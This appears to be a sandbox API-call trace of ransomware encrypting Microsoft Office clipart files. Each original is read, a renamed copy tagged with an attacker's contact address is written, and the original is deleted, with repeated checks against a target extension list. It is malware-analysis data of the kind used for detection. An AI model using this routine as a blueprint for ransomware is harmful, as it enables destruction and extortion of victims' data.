	[0144.084] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00405_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c
	[0144.084] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.084] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.084] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00405_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0144.084] GetLastError () returned 0x0
	[0144.085] ReadFile (in: hFile=0x39c, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x44b0, lpOverlapped=0x0) returned 1
	[0144.086] WriteFile (in: hFile=0x25c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x44c0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x44c0, lpOverlapped=0x0) returned 1
	[0144.087] ReadFile (in: hFile=0x39c, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0144.087] WriteFile (in: hFile=0x25c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0144.088] SetEndOfFile (hFile=0x25c) returned 1
	[0144.088] CloseHandle (hObject=0x25c) returned 1
	[0144.088] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.088] SetEndOfFile (hFile=0x39c) returned 1
	[0144.090] CloseHandle (hObject=0x39c) returned 1
	[0144.090] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0144.091] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00405_.wmf")) returned 1
	[0144.091] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 63
	[0144.091] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 63
	[0144.091] lstrlenW (lpString=".doc") returned 4
	[0144.091] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.091] lstrlenW (lpString=".docx") returned 5
	[0144.091] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.091] lstrlenW (lpString=".pdf") returned 4
	[0144.091] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.091] lstrlenW (lpString=".xls") returned 4
	[0144.091] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.091] lstrlenW (lpString=".xlsx") returned 5
	[0144.091] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.091] lstrlenW (lpString=".ppt") returned 4
	[0144.091] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.091] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 63
	[0144.091] lstrlenW (lpString=".zip") returned 4
	[0144.091] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.091] lstrlenW (lpString=".rar") returned 4
	[0144.091] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.092] lstrlenW (lpString=".bz2") returned 4
	[0144.092] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.092] lstrlenW (lpString=".7z") returned 3
	[0144.092] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.092] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 63
	[0144.092] lstrlenW (lpString=".dbf") returned 4
	[0144.092] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.092] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 63
	[0144.092] lstrlenW (lpString=".1cd") returned 4
	[0144.092] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.092] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 63
	[0144.092] lstrlenW (lpString=".jpg") returned 4
	[0144.092] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.092] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 63
	[0144.092] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 63
	[0144.092] lstrlenW (lpString=".doc") returned 4
	[0144.092] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.092] lstrlenW (lpString=".docx") returned 5
	[0144.092] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.092] lstrlenW (lpString=".pdf") returned 4
	[0144.092] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.092] lstrlenW (lpString=".xls") returned 4
	[0144.092] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.092] lstrlenW (lpString=".xlsx") returned 5
	[0144.092] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.092] lstrlenW (lpString=".ppt") returned 4
	[0144.092] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.092] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 63
	[0144.092] lstrlenW (lpString=".zip") returned 4
	[0144.092] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.092] lstrlenW (lpString=".rar") returned 4
	[0144.092] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.092] lstrlenW (lpString=".bz2") returned 4
	[0144.092] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.093] lstrlenW (lpString=".7z") returned 3
	[0144.093] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.093] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 63
	[0144.093] lstrlenW (lpString=".dbf") returned 4
	[0144.093] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.093] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 63
	[0144.093] lstrlenW (lpString=".1cd") returned 4
	[0144.093] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.093] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 63
	[0144.093] lstrlenW (lpString=".jpg") returned 4
	[0144.093] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.093] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0144.093] lstrlenW (lpString="DD00407_.WMF") returned 12
	[0144.093] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00407_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c
	[0144.093] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=7828) returned 1
	[0144.094] CloseHandle (hObject=0x39c) returned 1
	[0144.094] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00407_.wmf")) returned 0x20
	[0144.094] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00407_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.094] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00407_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c
	[0144.094] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.094] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.094] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00407_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0144.095] GetLastError () returned 0x0
	[0144.095] ReadFile (in: hFile=0x39c, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x1e94, lpOverlapped=0x0) returned 1
	[0144.096] WriteFile (in: hFile=0x25c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x1ea0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x1ea0, lpOverlapped=0x0) returned 1
	[0144.097] ReadFile (in: hFile=0x39c, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0144.097] WriteFile (in: hFile=0x25c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0144.097] SetEndOfFile (hFile=0x25c) returned 1
	[0144.097] CloseHandle (hObject=0x25c) returned 1
	[0144.097] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.098] SetEndOfFile (hFile=0x39c) returned 1
	[0144.100] CloseHandle (hObject=0x39c) returned 1
	[0144.100] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0144.100] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00407_.wmf")) returned 1
	[0144.100] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 63
	[0144.101] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 63
	[0144.101] lstrlenW (lpString=".doc") returned 4
	[0144.101] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.101] lstrlenW (lpString=".docx") returned 5
	[0144.101] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.101] lstrlenW (lpString=".pdf") returned 4
	[0144.101] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.101] lstrlenW (lpString=".xls") returned 4
	[0144.101] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.101] lstrlenW (lpString=".xlsx") returned 5
	[0144.101] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.101] lstrlenW (lpString=".ppt") returned 4
	[0144.101] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.101] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 63
	[0144.101] lstrlenW (lpString=".zip") returned 4
	[0144.101] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.101] lstrlenW (lpString=".rar") returned 4
	[0144.101] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.101] lstrlenW (lpString=".bz2") returned 4
	[0144.101] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.101] lstrlenW (lpString=".7z") returned 3
	[0144.101] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.101] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 63
	[0144.101] lstrlenW (lpString=".dbf") returned 4
	[0144.101] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.101] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 63
	[0144.101] lstrlenW (lpString=".1cd") returned 4
	[0144.101] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.101] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 63
	[0144.101] lstrlenW (lpString=".jpg") returned 4
	[0144.101] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.101] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 63
	[0144.101] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 63
	[0144.102] lstrlenW (lpString=".doc") returned 4
	[0144.102] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.102] lstrlenW (lpString=".docx") returned 5
	[0144.102] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.102] lstrlenW (lpString=".pdf") returned 4
	[0144.102] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.102] lstrlenW (lpString=".xls") returned 4
	[0144.102] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.102] lstrlenW (lpString=".xlsx") returned 5
	[0144.102] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.102] lstrlenW (lpString=".ppt") returned 4
	[0144.102] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 63
	[0144.102] lstrlenW (lpString=".zip") returned 4
	[0144.102] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.102] lstrlenW (lpString=".rar") returned 4
	[0144.102] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.102] lstrlenW (lpString=".bz2") returned 4
	[0144.102] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.102] lstrlenW (lpString=".7z") returned 3
	[0144.102] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 63
	[0144.102] lstrlenW (lpString=".dbf") returned 4
	[0144.102] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 63
	[0144.102] lstrlenW (lpString=".1cd") returned 4
	[0144.102] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 63
	[0144.102] lstrlenW (lpString=".jpg") returned 4
	[0144.102] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.103] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0144.103] lstrlenW (lpString="DD00413_.WMF") returned 12
	[0144.103] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00413_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0144.296] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=42992) returned 1
	[0144.296] CloseHandle (hObject=0x3cc) returned 1
	[0144.296] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00413_.wmf")) returned 0x20
	[0144.334] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00413_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.335] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00413_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c
	[0144.335] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.335] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.335] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00413_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0144.336] GetLastError () returned 0x0
	[0144.336] ReadFile (in: hFile=0x39c, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0xa7f0, lpOverlapped=0x0) returned 1
	[0144.374] WriteFile (in: hFile=0x25c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xa800, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xa800, lpOverlapped=0x0) returned 1
	[0144.375] ReadFile (in: hFile=0x39c, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0144.375] WriteFile (in: hFile=0x25c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0144.375] SetEndOfFile (hFile=0x25c) returned 1
	[0144.375] CloseHandle (hObject=0x25c) returned 1
	[0144.375] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.375] SetEndOfFile (hFile=0x39c) returned 1
	[0144.378] CloseHandle (hObject=0x39c) returned 1
	[0144.378] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0144.389] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00413_.wmf")) returned 1
	[0144.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 63
	[0144.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 63
	[0144.390] lstrlenW (lpString=".doc") returned 4
	[0144.390] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.390] lstrlenW (lpString=".docx") returned 5
	[0144.390] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.390] lstrlenW (lpString=".pdf") returned 4
	[0144.390] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.390] lstrlenW (lpString=".xls") returned 4
	[0144.390] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.390] lstrlenW (lpString=".xlsx") returned 5
	[0144.390] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.390] lstrlenW (lpString=".ppt") returned 4
	[0144.390] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 63
	[0144.390] lstrlenW (lpString=".zip") returned 4
	[0144.390] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.390] lstrlenW (lpString=".rar") returned 4
	[0144.390] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.391] lstrlenW (lpString=".bz2") returned 4
	[0144.391] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.391] lstrlenW (lpString=".7z") returned 3
	[0144.391] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 63
	[0144.391] lstrlenW (lpString=".dbf") returned 4
	[0144.391] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 63
	[0144.391] lstrlenW (lpString=".1cd") returned 4
	[0144.391] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 63
	[0144.391] lstrlenW (lpString=".jpg") returned 4
	[0144.391] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 63
	[0144.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 63
	[0144.391] lstrlenW (lpString=".doc") returned 4
	[0144.391] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.391] lstrlenW (lpString=".docx") returned 5
	[0144.391] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.391] lstrlenW (lpString=".pdf") returned 4
	[0144.391] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.391] lstrlenW (lpString=".xls") returned 4
	[0144.391] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.391] lstrlenW (lpString=".xlsx") returned 5
	[0144.391] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.391] lstrlenW (lpString=".ppt") returned 4
	[0144.391] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 63
	[0144.391] lstrlenW (lpString=".zip") returned 4
	[0144.391] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.391] lstrlenW (lpString=".rar") returned 4
	[0144.391] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.391] lstrlenW (lpString=".bz2") returned 4
	[0144.391] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.392] lstrlenW (lpString=".7z") returned 3
	[0144.392] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 63
	[0144.392] lstrlenW (lpString=".dbf") returned 4
	[0144.392] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 63
	[0144.392] lstrlenW (lpString=".1cd") returned 4
	[0144.392] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 63
	[0144.392] lstrlenW (lpString=".jpg") returned 4
	[0144.392] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.392] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0144.392] lstrlenW (lpString="DD01146_.WMF") returned 12
	[0144.392] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01146_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0144.392] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=2796) returned 1
	[0144.392] CloseHandle (hObject=0x384) returned 1
	[0144.393] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01146_.wmf")) returned 0x20
	[0144.396] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01146_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.402] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01146_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
